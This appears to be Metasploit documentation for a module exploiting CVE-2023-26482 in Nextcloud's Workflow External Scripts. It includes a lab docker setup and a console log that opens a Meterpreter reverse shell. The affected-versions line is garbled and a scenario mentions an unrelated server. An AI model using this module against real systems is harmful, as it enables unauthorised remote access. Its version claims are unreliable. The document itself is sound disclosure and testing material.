2025-04-09 11:24:47 +00:00
## Description
This module exploits a command injection that leads to a remote execution in Nextcloud installations if the app Workflow External Scripts is also installed.
The vulnerability affects Nextcloud versions >= 24.0.0, >= 25.0.0, >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0, >= 25.0.0
A missing scope validation allowed users to create workflows which are designed to be only available for administrators. In combination with Workflow External Script, this vulnerability
leads to authenticated remote command execution.
More about the vulnerability detail: [CVE-2023-26482 ](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26482 ).
The module will automatically use `cmd/linux/http/x64/meterpreter/reverse_tcp` payload.
The module will check if the target is vulnerable, by adding and removing a dummy-workflow.
## Vulnerable Application
[Nextcloud ](https://nextcloud.com/ ) is a suite of client-server software for creating and using file hosting services.
This module has been tested successfully on Nextcloud versions:
* Nextcloud version 24.0.5
### Source and Installers
* [Source Code Repository ](https://github.com/nextcloud/server/releases/tag/v24.0.5 )
* [Docker ](https://hub.docker.com/_/nextcloud )
### Docker Installation
This exploit was tested using a [nextcloud docker container ](https://hub.docker.com/_/nextcloud ) and [docker-compose ](https://docs.docker.com/compose/ )
with the following docker-compose.yml:
``` yaml
volumes :
nextcloud :
db :
services :
db :
image : mariadb:10.6
restart : always
command : --transaction-isolation=READ-COMMITTED --log-bin=binlog --binlog-format=ROW
volumes :
- db:/var/lib/mysql
environment :
- MARIADB_ROOT_PASSWORD=root
- MARIADB_PASSWORD=root
- MARIADB_DATABASE=nextcloud
- MARIADB_USER=nextcloud
app :
image : nextcloud:24.0.5
restart : always
ports :
- 8080 : 80
links :
- db
environment :
- MYSQL_PASSWORD=root
- MYSQL_DATABASE=nextcloud
- MYSQL_USER=root
- MYSQL_HOST=db
- NEXTCLOUD_ADMIN_PASSWORD=admin
- NEXTCLOUD_ADMIN_USER=admin
- NEXTCLOUD_TRUSTED_DOMAINS="192.168.233.64:8080"
depends_on :
- db
```
**_NOTE:_ ** Change the IP-address and port for NEXTCLOUD_TRUSTED_DOMAINS for your setup
After `docker compose up -d` login as admin and install the workflow app: "Workflow external script" and
create a low privileged user `alice` . Make sure that you choose "Cron(Recommended)" in the Settings for "Background Jobs".
Before we can run the exploit, we need to start the cronjob. This is crucial because otherwise the
payload doesn't get triggered:
```
2025-05-14 13:40:47 +00:00
docker exec -it -u www-data nextcloud-app-1 /bin/bash
2025-04-09 11:24:47 +00:00
watch -n2 php cron.php
```
Wait until you the watch-command outputs something like: "Every 2.0s: php cron.php".
## Verification Steps
Example steps in this format (is also in the PR):
1. Do: `use exploit/unix/webapp/nextcloud_workflows_rce`
2. Do: `set RHOSTS [ips]`
3. Do: `set LHOST [lhost]`
4. Do: `set RPORT 8080`
5. Do: `set USERNAME alice`
6. Do: `set PASSWORD alice-password`
7. Do: `run`
8. You should get a shell after a while
## Options
### TARGETURI
Remote web path to the nextcloud installation (default: /)
### USERNAME
The low-privileged username to authenticate to nextcloud
### PASSWORD
The password for the low-privileged user
## Scenarios
In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is
192.42.1.188.
### Nextcloud 24.0.5(docker-compose)
The following demo shows how to use the exploit:
```
2025-07-17 09:53:40 +01:00
msf > use exploit/unix/webapp/nextcloud_workflows_rce
2025-04-09 11:24:47 +00:00
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
2025-07-17 09:53:40 +01:00
msf exploit(unix/webapp/nextcloud_workflows_rce) > set RHOSTS 192.168.233.64
2025-04-09 11:24:47 +00:00
RHOSTS => 192.168.233.64
2025-07-17 09:53:40 +01:00
msf exploit(unix/webapp/nextcloud_workflows_rce) > set LHOST 192.168.233.117
2025-04-09 11:24:47 +00:00
LHOST => 192.168.233.117
2025-07-17 09:53:40 +01:00
msf exploit(unix/webapp/nextcloud_workflows_rce) > set RPORT 8080
2025-04-09 11:24:47 +00:00
RPORT => 8080
2025-07-17 09:53:40 +01:00
msf exploit(unix/webapp/nextcloud_workflows_rce) > set USERNAME alice
2025-04-09 11:24:47 +00:00
USERNAME => alice
2025-07-17 09:53:40 +01:00
msf exploit(unix/webapp/nextcloud_workflows_rce) > set PASSWORD CaeD4ohchaiv5ieDooBa
2025-04-09 11:24:47 +00:00
PASSWORD => CaeD4ohchaiv5ieDooBa
2025-07-17 09:53:40 +01:00
msf exploit(unix/webapp/nextcloud_workflows_rce) > run
2025-04-09 11:24:47 +00:00
[*] Started reverse TCP handler on 192.168.233.117:4444
[*] Sending payload..
[+] Workflow created
[*] Waiting for the payload to connect back ..
[*] Sending stage (3045380 bytes) to 192.168.233.64
[*] Meterpreter session 1 opened (192.168.233.117:4444 -> 192.168.233.64:37090) at 2025-04-10 13:27:49 +0000
[+] Payload connected!
[*] Cleaning up
meterpreter > getuid
Server username: www-data
```
2025-05-05 15:33:25 +00:00
## Limitations
Ensure that your `WfsDelay` advanced option is set to a value that allows `cron` to execute the payload. Default is 16 minutes
